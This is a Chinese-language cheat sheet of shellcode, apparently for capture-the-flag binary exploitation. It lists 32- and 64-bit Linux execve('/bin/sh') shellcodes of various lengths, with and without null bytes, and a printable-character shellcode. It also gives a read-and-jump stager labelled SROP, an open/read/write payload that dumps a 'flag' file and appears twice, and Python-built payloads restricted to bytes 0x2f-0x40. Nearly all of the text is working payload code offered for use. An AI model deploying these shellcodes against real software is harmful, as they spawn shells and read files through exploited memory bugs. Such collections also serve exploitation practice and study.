常用shellcode总结

32位

有“\x00”最短 20 byte

; execve("/bin/sh", NULL, NULL) on 32-bit Linux via int 0x80, Intel syntax.
; 20 bytes. The 0x00 byte the heading refers to is the top byte of the
; 0x68732f immediate (encoded as 0x0068732f); it doubles as the string terminator.
; Register roles at the syscall: eax = nr, ebx = path, ecx = argv, edx = envp.
xor ecx,ecx                 ; ecx = 0            -> argv = NULL
mul ecx                     ; eax = edx = 0      -> envp = NULL (edx); eax cleared for the mov al below
mov al,0xb                  ; eax = 11 = __NR_execve (i386); upper bytes are already 0
push 0x68732f               ; "/sh\0" little-endian (top byte 0x00 terminates the string)
push 0x6e69622f             ; "/bin"  -> [esp] = "/bin/sh\0"
mov ebx,esp                 ; ebx = pathname
int 0x80                    ; execve(ebx, ecx, edx)

无“\x00”最短 21 byte

; execve("/bin//sh", NULL, NULL) on 32-bit Linux, 21 bytes, no 0x00 byte in the
; encoding: the terminator is pushed from eax (already 0) instead of being part
; of an immediate, and "//sh" pads the path to four bytes (a doubled slash is
; a valid, equivalent path).
xor ecx,ecx                 ; ecx = 0 -> argv = NULL
mul ecx                     ; eax = edx = 0 -> envp = NULL
push eax                    ; NUL terminator for the string pushed below
mov al,0xb                  ; eax = 11 = __NR_execve (i386)
push 0x68732f2f             ; "//sh"
push 0x6e69622f             ; "/bin" -> [esp] = "/bin//sh\0"
mov ebx,esp                 ; ebx = pathname
int 0x80                    ; execve(ebx, ecx, edx)

标准shellcode 23 byte

; execve("/bin//sh", NULL, NULL) on 32-bit Linux, 23 bytes. Same layout as the
; 21-byte form, but ecx/edx are cleared with separate xors instead of mul, and
; eax is cleared right before the syscall number is loaded.
xor ecx,ecx                 ; argv = NULL
xor edx,edx                 ; envp = NULL
push edx                    ; NUL terminator
push 0x68732f2f             ; "//sh"
push 0x6e69622f             ; "/bin" -> [esp] = "/bin//sh\0"
mov ebx,esp                 ; ebx = pathname
xor eax,eax                 ; clear eax so the byte-sized mov below yields 11
mov al,0xB                  ; eax = 11 = __NR_execve (i386)
int 0x80                    ; execve(ebx, ecx, edx)

64位

最短有“\x00” 22 byte

; execve("/bin/sh", NULL, NULL) on x86-64 Linux via syscall, 22 bytes.
; The single 0x00 byte is the top byte of the 8-byte immediate below, which
; also terminates the string. At the syscall: rax = nr, rdi = path,
; rsi = argv, rdx = envp.
xor rsi,rsi                 ; rsi = 0 -> argv = NULL
mul esi                     ; eax = edx = 0; 32-bit writes zero-extend, so rax = rdx = 0 -> envp = NULL
mov rbx,0x68732f6e69622f    ; "/bin/sh\0" little-endian (top byte 0x00 = terminator)
push rbx                    ; [rsp] = "/bin/sh\0"
push rsp                    ; rdi = rsp via two single-byte instructions
pop rdi                     ; rdi = pathname
mov al, 59                  ; rax = 59 = __NR_execve (x86-64); upper bytes already 0
syscall                     ; execve(rdi, rsi, rdx)

最短无“\x00” 23 byte

; execve("/bin//sh", NULL, NULL) on x86-64 Linux, 23 bytes, no 0x00 byte:
; the terminator is pushed from rax (already 0) and "/bin//sh" fills all
; eight bytes of the immediate.
xor rsi,rsi                 ; argv = NULL
mul esi                     ; rax = rdx = 0 (32-bit result zero-extended) -> envp = NULL
push rax                    ; NUL terminator
mov rbx,0x68732f2f6e69622f  ; "/bin//sh"
push rbx                    ; [rsp] = "/bin//sh\0"
push rsp
pop rdi                     ; rdi = pathname
mov al, 59                  ; rax = 59 = __NR_execve (x86-64)
syscall                     ; execve(rdi, rsi, rdx)

标准shellcode 31 byte

; execve("/bin//sh", NULL, NULL) on x86-64 Linux, 31 bytes: the "standard"
; form where every argument register is cleared explicitly and the path
; pointer is set with a plain mov.
xor    rdi,rdi              ; cleared here but overwritten by mov rdi,rsp below (redundant in this form)
xor rsi,rsi                 ; argv = NULL
xor rdx,rdx                 ; envp = NULL
xor rax,rax                 ; clear rax so mov al below yields 59
push rax                    ; NUL terminator
mov rbx,0x68732f2f6e69622f  ; "/bin//sh"
push rbx                    ; [rsp] = "/bin//sh\0"
mov rdi,rsp                 ; rdi = pathname
mov al,0x3b                 ; rax = 59 = __NR_execve (x86-64)
syscall                     ; execve(rdi, rsi, rdx)

可见字符

Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

SROP

# Stage-1 stub, x86-64 Linux, Intel syntax (for an assembler such as pwntools'
# asm()): read(0, addr, 0x1000) from stdin into the region at `addr`, then
# jmp there. The region therefore has to be both writable and executable.
# `addr` must be an int already in scope; it is substituted via %d.
# Syscall numbers used: read = 0 (mov eax,0).
# NOTE(review): despite the "SROP" heading, nothing here issues rt_sigreturn;
# this is a plain read-and-jump stager.
shell1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall

jmp rsi
''' % addr
# open/read/write/exit sequence ("ORW"), x86-64 Linux, Intel syntax:
#   open("flag", 0, 0)   -> rax = fd   (0x67616c66 is "flag" little-endian; push rax
#                                       stores it followed by four 0x00 bytes = terminator)
#   read(fd, rsp, 1024)  -> rax = n    (reads onto the stack, over the name)
#   write(1, rsp, n)
#   exit(0)
# Syscall numbers: open = 2, read = 0, write = 1, exit = 60 (x86-64).
# The return value of open is not checked; a negative (-errno) value is
# passed straight into read, and exit(0) then masks the failure.
shell2 = '''
mov rax,0x67616c66
push rax

mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall

mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall

mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall

mov rdi,0
mov rax,60
syscall
'''

ORW

# open/read/write/exit sequence ("ORW"), x86-64 Linux, Intel syntax:
#   open("flag", 0, 0)   -> rax = fd   (0x67616c66 is "flag" little-endian; push rax
#                                       stores it followed by four 0x00 bytes = terminator)
#   read(fd, rsp, 1024)  -> rax = n    (reads onto the stack, over the name)
#   write(1, rsp, n)
#   exit(0)
# Syscall numbers: open = 2, read = 0, write = 1, exit = 60 (x86-64).
# The return value of open is not checked; a negative (-errno) value is
# passed straight into read, and exit(0) then masks the failure.
shell2 = '''
mov rax,0x67616c66
push rax

mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall

mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall

mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall

mov rdi,0
mov rax,60
syscall
'''

\x2f-\x40 read

需要从base_addr+3开始写入

# Restricted-charset payload for the "\x2f-\x40 read" case. With
# base_addr = 0x33333000, every literal byte and every byte of the p32()
# addresses below falls inside 0x2f..0x40, the range named in the heading
# (e.g. base_addr+0x53f = 0x3333353f -> bytes 3f 35 33 33).
# p32 is presumably pwntools' 32-bit little-endian pack; it is not imported
# here. Per the heading, the bytes must be placed starting at base_addr+3.
base_addr = 0x33333000
payload = b'\x35'+p32(base_addr+0x35)+b'\x33\x30\x32\x30\x35'+p32(base_addr+0x35)+b'\x35'+p32(base_addr+0x31)+b'\x31\x30'
payload += b'\x3c\x3d'*0xa
payload += b'\x35' + p32(base_addr+0x31) # xor eax,0x30303034
payload += p32(base_addr+0x53f) # syscall data
payload += p32(base_addr+0x30) # esi data

\x2f-\x40 readv

# Restricted-charset payload for the "\x2f-\x40 readv" case. With
# base_addr = 0x33333000, every literal byte and every byte of the p32()
# addresses below falls inside 0x2f..0x40, the range named in the heading
# (e.g. base_addr+0x2f = 0x3333302f -> bytes 2f 30 33 33).
# p32 is presumably pwntools' 32-bit little-endian pack; it is not imported
# here. The trailing per-line comments are the author's own notes on what
# each fragment is meant to set up.
base_addr = 0x33333000
payload = b''
payload += b'\x35'+p32(base_addr+0x334)+b'\x33\x30\x3c\x3d' # set esi
payload += b'\x35'+p32(base_addr+0x334)+b'\x35'+p32(base_addr+0x334)+b'\x31\x30\x3c\x3d' # xor addr+0x334
payload += b'\x35'+p32(base_addr+0x334)+b'\x35'+p32(base_addr+0x235)+b'\x32\x38'+b'\x35'+p32(base_addr+0x235)+b'\x35'+p32(base_addr+0x3f)+b'\x30\x38\x3c\x3d' # set bh
payload += b'\x35'+p32(base_addr+0x3f)+b'\x35'+p32(base_addr+0x235)+b'\x32\x2f\x3c\x3d' # dl xor 0x40
payload += b'\x3c\x3d'*0x65
payload += b'\x35'+p32(base_addr+0x235)+b'\x35'+p32(base_addr+0x335)+b'\x32\x38'+b'\x35'+p32(base_addr+0x335)+b'\x35'+p32(base_addr+0x131)+b'\x30\x38\x3c\x3d' # set bh
payload += b'\x35'+p32(base_addr+0x131)+b'\x35'+p32(base_addr+0x236)+b'\x32\x2f\x3c\x3d' # dl xor 0x3f
payload += b'\x35'+p32(base_addr+0x236)+b'\x35'+p32(base_addr+0x33c)+b'\x31\x30\x3c\x3d' # xor addr+0x33c
payload += b'\x35'+p32(base_addr+0x33c)+b'\x35'+p32(base_addr+0x231)+b'\x31\x30\x3c\x3d' # gen syscall opcode
payload += b'\x35'+p32(base_addr+0x231)+b'\x35'+p32(base_addr+0x2f) +b'\x35'+p32(base_addr+0x3c)# set rax
payload += b'\x3c\x3d'*0x69
payload += b'\x3f\x36\x33\x33' # +0x231
payload += b'\x3f\x3e'
payload += b'\x3c\x3d'*0x7c
payload += b'\x30'
payload += p32(base_addr+0x233)+p32(base_addr+0x330)*3 # +0x330